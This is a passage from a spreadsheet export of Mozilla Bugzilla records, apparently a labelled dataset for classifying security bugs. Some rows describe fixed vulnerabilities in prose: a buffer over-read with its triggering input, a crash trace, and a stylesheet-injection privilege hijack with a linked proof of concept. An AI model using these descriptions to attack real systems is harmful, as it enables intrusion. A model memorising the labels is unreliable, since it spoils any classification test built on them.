==7971==ERROR: AddressSanitizer: SEGV on unknown address 0x0000dfff8000 (pc 0x7f58fb6e7943 sp 0x7fff44347e00 bp 0x7fff44347eb0 T0)
AddressSanitizer can not provide additional info.
    #0 0x7f58fb6e7942 in nsGfxScrollFrameInner::IsLTR() const /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsGfxScrollFrame.cpp:3302:0
    #1 0x7f58fb6ca4c3 in nsGfxScrollFrameInner::GetScrolledRectInternal(nsRect const&amp;, nsSize const&amp;) const /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsGfxScrollFrame.cpp:3983:0
    #2 0x7f58fb6ca4c3 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsGfxScrollFrame.cpp:574:0
    #3 0x7f58fb6cc40a in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsGfxScrollFrame.cpp:783:0
    #4 0x7f58fb64dad3 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsContainerFrame.cpp:970:0
    #5 0x7f58fb7f8177 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsViewportFrame.cpp:225:0
    #6 0x7f58fb53d539 in PresShell::DoReflow(nsIFrame*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/base/nsPresShell.cpp:7850:0
    #7 0x7f58fb54eda8 in PresShell::ProcessReflowCommands(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/base/nsPresShell.cpp:7991:0
    #8 0x7f58fb54e66f in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/base/nsPresShell.cpp:3890:0
    #9 0x7f58fb582704 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/base/nsRefreshDriver.cpp:1191:0
    #10 0x7f58fb5889f0 in mozilla::RefreshDriverTimer::TickDriver(nsRefreshDriver*, long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/base/nsRefreshDriver.cpp:171:0
    #11 0x7f58fb5889f0 in mozilla::RefreshDriverTimer::Tick() /builds/slave/m-cen-l64-asan-000000000000000/build/layout/base/nsRefreshDriver.cpp:163:0
    #12 0x7f58ff1ace1a in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsTimerImpl.cpp:544:0
    #13 0x7f58ff1ad4a6 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsTimerImpl.cpp:628:0
    #14 0x7f58ff1a2829 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThread.cpp:622:0
    #15 0x7f58ff0cc8c6 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238:0
    #16 0x7f58fdf5fc51 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/ipc/glue/MessagePump.cpp:81:0
    #17 0x7f58ff2ca6c3 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-asan-000000000000000/build/ipc/chromium/src/base/message_loop.cc:220:0
    #18 0x7f58ff2ca6c3 in MessageLoop::RunHandler() /builds/slave/m-cen-l64-asan-000000000000000/build/ipc/chromium/src/base/message_loop.cc:213:0
    #19 0x7f58ff2ca6c3 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/ipc/chromium/src/base/message_loop.cc:187:0
    #20 0x7f58fdd4e6cc in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp:163:0
    #21 0x7f58fd74663e in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/toolkit/components/startup/nsAppStartup.cpp:269:0
    #22 0x7f58fa95c0f0 in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-000000000000000/build/toolkit/xre/nsAppRunner.cpp:3858:0
    #23 0x7f58fa95d055 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-000000000000000/build/toolkit/xre/nsAppRunner.cpp:3926:0
    #24 0x7f58fa95df8b in XRE_main /builds/slave/m-cen-l64-asan-000000000000000/build/toolkit/xre/nsAppRunner.cpp:4128:0
    #25 0x459c8d in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-asan-000000000000000/build/browser/app/nsBrowserApp.cpp:275:0
    #26 0x459c8d in main /builds/slave/m-cen-l64-asan-000000000000000/build/browser/app/nsBrowserApp.cpp:635:0
    #27 0x7f5909567ea4 in ?? ??:0
    #28 0x45910c in _start ??:?
==7971==ABORTING</t>
        </is>
      </c>
      <c r="X280" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="281">
      <c r="A281" t="n">
        <v>1170246</v>
      </c>
      <c r="B281" t="inlineStr">
        <is>
          <t>2015-06-01 11:21:55 -0700</t>
        </is>
      </c>
      <c r="C281" t="inlineStr">
        <is>
          <t>Memory-safety bugs in ConvertDialogOptions</t>
        </is>
      </c>
      <c r="D281" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E281" t="n">
        <v>1</v>
      </c>
      <c r="F281" t="n">
        <v>1</v>
      </c>
      <c r="G281" t="n">
        <v>3</v>
      </c>
      <c r="H281" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I281" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J281" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K281" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N281" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P281" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q281" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R281" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S281" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T281" t="n">
        <v>1</v>
      </c>
      <c r="U281" t="n">
        <v>0</v>
      </c>
      <c r="V281" t="n">
        <v>18</v>
      </c>
      <c r="W281" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
ConvertDialogOptions (38.0.1\dom\base\nsGlobalWindow.cpp) routinely references memory that it does not own, referencing iterators that could == end without first checking. See lines 9071, 9088, 9092, 9102, 9108, etc., which use expressions of the form:
    while (nsCRT::IsAsciiSpace(*iter) &amp;&amp; iter != end) {...
This function can also enter a long loop. If the aOptions string contains the single character " ", followed in memory by ";", the function will run well beyond the end of the aOptions argument, parsing data it does not own until it access-violates. Lines 9071-73 skip the space and increment iter to == end. Lines from 9074-91 do nothing. Then the if statement on lines 9092-97 dereferences iter, finds that *iter is ";", increments iter so that it is no longer == end, and continues the outer while (iter != end) loop (line 9069), which then runs until the code increments iter to point to an inaccessible area of memory and dereferences it, causing an access violation.
This can occur because aOptions isa nsAString, which is not necessarily zero-terminated according to https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Glue_classes/nsAString/BeginReading .
I think the worst consequence of these bugs is a crash, but I can't rule out a compromise of sensitive data and/or overwriting of unowned portions of Firefox's address space.</t>
        </is>
      </c>
      <c r="X281" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="282">
      <c r="A282" t="n">
        <v>1118783</v>
      </c>
      <c r="B282" t="inlineStr">
        <is>
          <t>2015-01-07 08:11:07 -0800</t>
        </is>
      </c>
      <c r="C282" t="inlineStr">
        <is>
          <t>Short URLs aren't being regenerated.</t>
        </is>
      </c>
      <c r="D282" t="inlineStr">
        <is>
          <t>2015-01-08 06:48:36 -0800</t>
        </is>
      </c>
      <c r="E282" t="n">
        <v>1</v>
      </c>
      <c r="F282" t="n">
        <v>1</v>
      </c>
      <c r="G282" t="n">
        <v>5</v>
      </c>
      <c r="H282" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I282" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J282" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K282" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L282" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M282" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N282" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P282" t="inlineStr">
        <is>
          <t>u=user c=wiki p=1 s=2015.1</t>
        </is>
      </c>
      <c r="Q282" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R282" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S282" t="inlineStr">
        <is>
          <t>2015Q1</t>
        </is>
      </c>
      <c r="T282" t="n">
        <v>1</v>
      </c>
      <c r="U282" t="n">
        <v>0</v>
      </c>
      <c r="V282" t="n">
        <v>12</v>
      </c>
      <c r="W282" t="inlineStr">
        <is>
          <t>As part of fixing bug 1108004, we cleared out all the short URLs so that they would be regenerated. I did a quick sampling of articles and didnt see any short URLs for them. This bug is to figure out what's going on. It's possible that we have regenerated some of them and are just hitting the rate limits so it will take a while to get to all of them. Or it could be something else is broken.</t>
        </is>
      </c>
      <c r="X282" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="283">
      <c r="A283" t="n">
        <v>1161063</v>
      </c>
      <c r="B283" t="inlineStr">
        <is>
          <t>2015-05-04 08:09:04 -0700</t>
        </is>
      </c>
      <c r="C283" t="inlineStr">
        <is>
          <t>Getting a stored MutableFile out of IndexedDB on a worker doesn't work</t>
        </is>
      </c>
      <c r="D283" t="inlineStr">
        <is>
          <t>2016-06-21 14:20:09 -0700</t>
        </is>
      </c>
      <c r="E283" t="n">
        <v>1</v>
      </c>
      <c r="F283" t="n">
        <v>1</v>
      </c>
      <c r="G283" t="n">
        <v>3</v>
      </c>
      <c r="H283" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I283" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J283" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K283" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L283" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M283" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N283" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P283" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q283" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R283" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S283" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T283" t="n">
        <v>1</v>
      </c>
      <c r="U283" t="n">
        <v>0</v>
      </c>
      <c r="V283" t="n">
        <v>36</v>
      </c>
      <c r="W283" t="inlineStr">
        <is>
          <t>While studying how web workers were implemented for IndexedDB, I believe I found a threading violation where a DOM method is executed on a worker but can trigger a method that can only be executed on the main thread. The call stack would be as follows:
IDBObjectStore::Add || IDBObjectStore::Put -- exposed on WebIDL
IDBObjectStore::AddOrPut -- asserts owning thread (due to Exposed=Worker, may not be main thread)
IDBObjectStore::GetAddInfo
[ KeyPath::ExtractOrCreateKey -&gt; GetJSValFromKeyPathString ] -- optional
IDBObjectStore::GetAddInfoCallback
JSAutoStructuredCloneBuffer::write
JS_WriteStructuredClone
WriteStructuredClone
JSStructuredCloneWriter::write
JSStructuredCloneWriter::startWrite -- calls callback-&gt;write, see below
StructuredCloneWriteCallback
IDBDatabase::GetQuotaInfo -- asserts main thread
This looks to be a corner case; we are trying to store a mutable file where our reference to the database for the write mismatches that of the file. Hopefully I did not miss a dispatch to the main thread somewhere along the way.</t>
        </is>
      </c>
      <c r="X283" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="284">
      <c r="A284" t="n">
        <v>532493</v>
      </c>
      <c r="B284" t="inlineStr">
        <is>
          <t>2009-12-02 13:27:06 -0800</t>
        </is>
      </c>
      <c r="C284" t="inlineStr">
        <is>
          <t>[SECURITY] Restricting a bug to a group while moving it to another product has no effect if the group is not used by both products</t>
        </is>
      </c>
      <c r="D284" t="inlineStr">
        <is>
          <t>2010-01-31 19:07:59 -0800</t>
        </is>
      </c>
      <c r="E284" t="n">
        <v>1</v>
      </c>
      <c r="F284" t="n">
        <v>1</v>
      </c>
      <c r="G284" t="n">
        <v>4</v>
      </c>
      <c r="H284" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I284" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J284" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K284" t="inlineStr">
        <is>
          <t>3.3.1</t>
        </is>
      </c>
      <c r="L284" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M284" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N284" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P284" t="inlineStr"/>
      <c r="Q284" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R284" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S284" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T284" t="n">
        <v>1</v>
      </c>
      <c r="U284" t="n">
        <v>0</v>
      </c>
      <c r="V284" t="n">
        <v>9</v>
      </c>
      <c r="W284" t="inlineStr">
        <is>
          <t>When moving a bug to a new product which doesn't use all the same groups as the original product, trying to restrict the bug to a group which doesn't exist in the original product has no effect; the bug is left public. This happened to me right now on bmo when moving a security bug from mozilla.org to Bugzilla. If the group exists in both products, it's restricted correctly.
Bugzilla 3.2.5 is not affected, so that's a regression in 3.4.x and HEAD only.</t>
        </is>
      </c>
      <c r="X284" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="285">
      <c r="A285" t="n">
        <v>1118297</v>
      </c>
      <c r="B285" t="inlineStr">
        <is>
          <t>2015-01-06 08:09:10 -0800</t>
        </is>
      </c>
      <c r="C285" t="inlineStr">
        <is>
          <t>create terraform config for Socorro</t>
        </is>
      </c>
      <c r="D285" t="inlineStr">
        <is>
          <t>2015-05-11 07:01:11 -0700</t>
        </is>
      </c>
      <c r="E285" t="n">
        <v>1</v>
      </c>
      <c r="F285" t="n">
        <v>1</v>
      </c>
      <c r="G285" t="n">
        <v>4</v>
      </c>
      <c r="H285" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I285" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J285" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K285" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L285" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M285" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N285" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P285" t="inlineStr"/>
      <c r="Q285" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R285" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S285" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T285" t="n">
        <v>1</v>
      </c>
      <c r="U285" t="n">
        <v>0</v>
      </c>
      <c r="V285" t="n">
        <v>9</v>
      </c>
      <c r="W285" t="inlineStr">
        <is>
          <t>Socorro needs a Terraform config to describe the Socorro infra:
load balancers -&gt; collectors
processors
crontabber
postgres server(s)
ES server(s)
S3 bucket(s)
SQS</t>
        </is>
      </c>
      <c r="X285" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="286">
      <c r="A286" t="n">
        <v>1462290</v>
      </c>
      <c r="B286" t="inlineStr">
        <is>
          <t>2018-05-17 02:49:14 -0700</t>
        </is>
      </c>
      <c r="C286" t="inlineStr">
        <is>
          <t>Recipe signature is not valid (for new signed recipes/recipe revisions)</t>
        </is>
      </c>
      <c r="D286" t="inlineStr">
        <is>
          <t>2018-05-21 04:58:14 -0700</t>
        </is>
      </c>
      <c r="E286" t="n">
        <v>1</v>
      </c>
      <c r="F286" t="n">
        <v>1</v>
      </c>
      <c r="G286" t="n">
        <v>2</v>
      </c>
      <c r="H286" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I286" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J286" t="inlineStr">
        <is>
          <t>Normandy Server</t>
        </is>
      </c>
      <c r="K286" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N286" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P286" t="inlineStr"/>
      <c r="Q286" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R286" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S286" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T286" t="n">
        <v>1</v>
      </c>
      <c r="U286" t="n">
        <v>0</v>
      </c>
      <c r="V286" t="n">
        <v>14</v>
      </c>
      <c r="W286" t="inlineStr">
        <is>
          <t>[Environment:]
Windows 8.1 x64
62.0a1 20180516220130
61.0b5 20180514150347
[Prerequisites:]
1. Set the app.normandy.dev_mode preference to true to run recipes immediately on startup.
2. Set the app.normandy.logging.level preference to 0 to enable more logging.
3. Set the security.content.signature.root_hash preference to DB:74:CE:58:E4:F9:D0:9E:E0:42:36:BE:6C:C5:C4:F6:6A:E7:74:7D:C0:21:42:7A:03:BC:2F:57:0C:8B:9B:90.
4. Set the preference value for app.normandy.api_url set to https://normandy.stage.mozaws.net/api/v1
[Steps:]
I.
   1. Open Control Center (https://normandy-admin.stage.mozaws.net/)
   2. Create a rollout recipe with the blob:
     {
     "preferences": [
     {
     "preferenceName": "test.int.1",
     "value": 1
     }
     ]
     "slug": "rollout-test"
     }
   3. Save, Approve, Publish the recipe.
   4. Set prerequisites and open a Firefox client which supports rollouts (Fx61+)
   5. Open Browser Console and notice the logs.
OR
 II.
   1. Open Control Center (https://normandy-admin.stage.mozaws.net/)
   2. Disable a published recipe.
   3. Publish again the disabled recipe.
   4. Set prerequisites and open a Firefox client which supports rollouts (Fx61+)
   5. Open Browser Console and notice the logs.
[Actual Result:]  
1526549697907	app.normandy.recipe-runner	ERROR	Could not fetch recipes from https://normandy.stage.mozaws.net/api/v1: "Error: recipe signature is not valid"
[Expected Result:]
Recipes should be signed correctly.
[Note:]
1. If all the recipes that have been updated/created today are disabled, Normandy works.
2. The recipe signature error is returned for any type of new/updated recipe (rollout / prefs exp.)</t>
        </is>
      </c>
      <c r="X286" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="287">
      <c r="A287" t="n">
        <v>424733</v>
      </c>
      <c r="B287" t="inlineStr">
        <is>
          <t>2008-03-23 21:39:41 -0700</t>
        </is>
      </c>
      <c r="C287" t="inlineStr">
        <is>
          <t>[FIX]CSS -moz-binding property bypasses security checks on codebase principals</t>
        </is>
      </c>
      <c r="D287" t="inlineStr">
        <is>
          <t>2009-01-08 13:42:07 -0800</t>
        </is>
      </c>
      <c r="E287" t="n">
        <v>1</v>
      </c>
      <c r="F287" t="n">
        <v>1</v>
      </c>
      <c r="G287" t="n">
        <v>3</v>
      </c>
      <c r="H287" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I287" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J287" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K287" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N287" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P287" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q287" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R287" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S287" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T287" t="n">
        <v>1</v>
      </c>
      <c r="U287" t="n">
        <v>0</v>
      </c>
      <c r="V287" t="n">
        <v>24</v>
      </c>
      <c r="W287" t="inlineStr">
        <is>
          <t>Following up on comment 9 on bug 424426 &lt;https://bugzilla.mozilla.org/show_bug.cgi?id=424426#c9&gt;, we did some testing and it appears that stylesheets don't invoke downgrading/blocking rules for codebase principals.
If a signed JAR includes &lt;link rel="stylesheet" href="some_relative_path.css"&gt; anywhere inside it, a malicious web site can replace the stylesheet using the JAR-switching technique originally described in comment #1 on bug 424426 &lt;https://bugzilla.mozilla.org/show_bug.cgi?id=418996#c1&gt;. The malicious stylesheet can then use the -moz-binding property to inject script into the page and hijack the signer's privileges.
The proof of concept is the "CSS" test case at &lt;http://crypto.stanford.edu/~collinj/research/signed-scripts/more-relative-paths.html&gt;.
It is likely that Flash and Java have similar problems.</t>
        </is>
      </c>
      <c r="X287" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="288">
      <c r="A288" t="n">
        <v>805714</v>
      </c>
      <c r="B288" t="inlineStr">
        <is>
          <t>2012-10-25 20:29:13 -0700</t>
        </is>
      </c>
      <c r="C288" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.13.2</t>
        </is>
      </c>
      <c r="D288" t="inlineStr">
        <is>
          <t>2012-11-17 06:08:08 -0800</t>
        </is>
      </c>
      <c r="E288" t="n">
        <v>1</v>
      </c>
      <c r="F288" t="n">
        <v>1</v>
      </c>
      <c r="G288" t="n">
        <v>2</v>
      </c>
      <c r="H288" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I288" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J288" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K288" t="inlineStr">
        <is>
          <t>SeaMonkey 2.13 Branch</t>
        </is>
      </c>
      <c r="L288" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M288" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N288" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P288" t="inlineStr"/>
      <c r="Q288" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R288" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S288" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T288" t="n">
        <v>1</v>
      </c>
      <c r="U288" t="n">
        <v>0</v>
      </c>
      <c r="V288" t="n">
        <v>4</v>
      </c>
      <c r="W288" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.13.2
We expect an actual release on Saturday 27th October.</t>
        </is>
      </c>
      <c r="X288" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" t="n">
        <v>209742</v>
      </c>
      <c r="B289" t="inlineStr">
        <is>
          <t>2003-06-18 00:04:25 -0700</t>
        </is>
      </c>
      <c r="C289" t="inlineStr">
        <is>
          <t>describecomponents.cgi displays products for which the user can't enter bugs</t>
        </is>
      </c>
      <c r="D289" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:36 -0800</t>
        </is>
      </c>
      <c r="E289" t="n">
        <v>1</v>
      </c>
      <c r="F289" t="n">
        <v>1</v>
      </c>
      <c r="G289" t="n">
        <v>4</v>
      </c>
      <c r="H289" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I289" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J289" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K289" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L289" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M289" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N289" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O289" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P289" t="inlineStr">
        <is>
          <t>[fixed in 2.17.5]</t>
        </is>
      </c>
      <c r="Q289" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R289" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S289" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T289" t="n">
        <v>1</v>
      </c>
      <c r="U289" t="n">
        <v>0</v>
      </c>
      <c r="V289" t="n">
        <v>14</v>
      </c>
      <c r="W289" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030312
describecomponents.cgi uses AnyDefaultGroups() to determine whether to check
CanEnterProducts() before showing the list of available products.  If all
products are configured with Mandatory/Mandatory group controls,
AnyDefaultGroups() returns false, and the user is given a list of all products,
even ones they're not supposed to see.
I think describecomponents.cgi should use AnyEntryGroups() instead, so that
whenever bug entry groups are in use, only the products for which a user can
enter bugs are displayed (which is how I interpret the desired behavior from bug
185505).
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X289" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="290">
      <c r="A290" t="n">
        <v>867788</v>
      </c>
      <c r="B290" t="inlineStr">
        <is>
          <t>2013-05-01 15:11:22 -0700</t>
        </is>
      </c>
      <c r="C290" t="inlineStr">
        <is>
          <t>Style up Student Ambassadors signup form</t>
        </is>
      </c>
      <c r="D290" t="inlineStr">
        <is>
          <t>2013-05-14 14:02:50 -0700</t>
        </is>
      </c>
      <c r="E290" t="n">
        <v>1</v>
      </c>
      <c r="F290" t="n">
        <v>1</v>
      </c>
      <c r="G290" t="n">
        <v>5</v>
      </c>
      <c r="H290" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I290" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J290" t="inlineStr">
        <is>
          <t>Pages &amp; Content</t>
        </is>
      </c>
      <c r="K290" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L290" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M290" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N290" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P290" t="inlineStr"/>
      <c r="Q290" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R290" t="inlineStr">
        <is>
